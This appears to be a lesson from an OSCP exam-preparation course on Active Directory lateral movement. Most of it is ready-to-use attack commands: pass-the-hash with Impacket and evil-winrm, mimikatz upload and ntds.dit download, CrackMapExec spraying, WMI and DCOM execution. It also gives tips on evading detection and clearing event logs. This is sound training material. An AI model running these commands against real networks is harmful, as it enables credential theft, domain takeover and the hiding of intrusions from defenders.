Active Directory & Exam Simulation
Lateral Movement
4 min read
After gaining initial access, you need to move through the network to reach high-value targets. Lateral movement is essential for the OSCP AD set.
Understanding Lateral Movement
Lateral Movement Flow:
Initial Access ──> Credential Harvest ──> Move to Next Host ──> Repeat
│ │ │
└── Low-priv user └── Dump hashes/creds └── Admin access
PsExec Variants
Impacket psexec.py
# With password
psexec.py corp.local/administrator:password@$TARGET
# With NTLM hash
psexec.py -hashes :NTHASH corp.local/administrator@$TARGET
# Execute specific command
psexec.py corp.local/administrator:password@$TARGET "whoami"
Impacket smbexec.py
# Stealthier than psexec (no binary upload)
smbexec.py corp.local/administrator:password@$TARGET
# With hash
smbexec.py -hashes :NTHASH corp.local/administrator@$TARGET
Impacket wmiexec.py
# Uses WMI (even stealthier)
wmiexec.py corp.local/administrator:password@$TARGET
# With hash
wmiexec.py -hashes :NTHASH corp.local/administrator@$TARGET
Comparison
| Tool | Method | Artifacts | Detection |
|---|---|---|---|
| psexec.py | SMB + service | Binary on disk | High |
| smbexec.py | SMB + batch file | Less artifacts | Medium |
| wmiexec.py | WMI | No disk write | Low |
| atexec.py | Task Scheduler | Scheduled task | Medium |
Evil-WinRM
Best tool for Windows Remote Management access.
# With password
evil-winrm -i $TARGET -u administrator -p 'password'
# With hash
evil-winrm -i $TARGET -u administrator -H NTHASH
# With Kerberos ticket
evil-winrm -i $TARGET -r corp.local
# Upload/download files
*Evil-WinRM* PS> upload /tmp/mimikatz.exe
*Evil-WinRM* PS> download C:\Windows\NTDS\ntds.dit
CrackMapExec Lateral Movement
Execute Commands
# Execute command
crackmapexec smb $TARGET -u admin -p 'password' -x "whoami"
# Execute PowerShell
crackmapexec smb $TARGET -u admin -p 'password' -X "Get-Process"
# Multiple targets
crackmapexec smb $NETWORK/24 -u admin -p 'password' -x "hostname"
Spray and Move
# Find where you have admin
crackmapexec smb $NETWORK/24 -u user -p 'password'
# Pwn3d! indicates admin access
# Then execute on those hosts
crackmapexec smb 192.168.1.10 -u user -p 'password' -x "whoami"
Windows Native Tools
PowerShell Remoting
# Enable PSRemoting (if admin)
Enable-PSRemoting -Force
# Enter remote session
Enter-PSSession -ComputerName TARGET -Credential corp\admin
# Execute command remotely
Invoke-Command -ComputerName TARGET -Credential corp\admin -ScriptBlock {whoami}
# Run on multiple computers
Invoke-Command -ComputerName SRV1,SRV2,SRV3 -ScriptBlock {hostname}
WMI
# Execute process via WMI
wmic /node:TARGET /user:administrator /password:password process call create "cmd.exe /c whoami > C:\result.txt"
# PowerShell variant
Invoke-WmiMethod -ComputerName TARGET -Credential $cred -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami"
PsExec (Sysinternals)
# Execute command
psexec \\TARGET -u corp\admin -p password cmd.exe
# Execute as SYSTEM
psexec \\TARGET -u corp\admin -p password -s cmd.exe
# Copy and execute file
psexec \\TARGET -u corp\admin -p password -c malware.exe
RDP Lateral Movement
Enabling RDP
# Enable RDP
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0
# Allow through firewall
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
Using xfreerdp (Linux)
# Connect with password
xfreerdp /u:administrator /p:password /v:$TARGET
# Connect with hash (Restricted Admin mode required)
xfreerdp /u:administrator /pth:NTHASH /v:$TARGET
# Full screen
xfreerdp /u:administrator /p:password /v:$TARGET /f
SharpRDP
# RDP execution without GUI
.\SharpRDP.exe computername=TARGET command="cmd.exe /c whoami" username=corp\admin password=password
SSH (Linux Targets)
# With password
ssh user@$TARGET
# With key
ssh -i id_rsa user@$TARGET
# Port forward through pivot
ssh -L 8080:internal-target:80 user@pivot
DCOM Lateral Movement
# Using DCOM (less common, good for evasion)
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","TARGET"))
$com.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c calc.exe","Minimized")
Lateral Movement Detection Avoidance
OPSEC Tips:
├── Prefer wmiexec over psexec (less artifacts)
├── Use native Windows tools when possible
├── Clear event logs selectively (if needed)
├── Use legitimate admin tools (PowerShell remoting)
└── Time attacks during business hours
Lateral Movement Workflow
1. Identify targets with BloodHound
└── Find shortest path to DA
2. Check admin access
└── crackmapexec smb TARGETS -u user -p pass
3. Move to accessible hosts
└── evil-winrm, wmiexec, psexec
4. Harvest credentials
└── mimikatz, secretsdump
5. Repeat with new credentials
└── Expand access until DA reached
Quick Reference
| Scenario | Tool | Command |
|---|---|---|
| Have password | evil-winrm | evil-winrm -i TARGET -u user -p pass |
| Have NTLM hash | wmiexec | wmiexec.py -hashes :HASH domain/user@TARGET |
| Have Kerberos ticket | psexec | psexec.py -k -no-pass domain/user@TARGET |
| Check admin access | crackmapexec | crackmapexec smb TARGETS -u user -p pass |
| RDP access | xfreerdp | xfreerdp /u:user /p:pass /v:TARGET |
Next, we'll cover exam strategy and practice scenarios for the OSCP exam. :::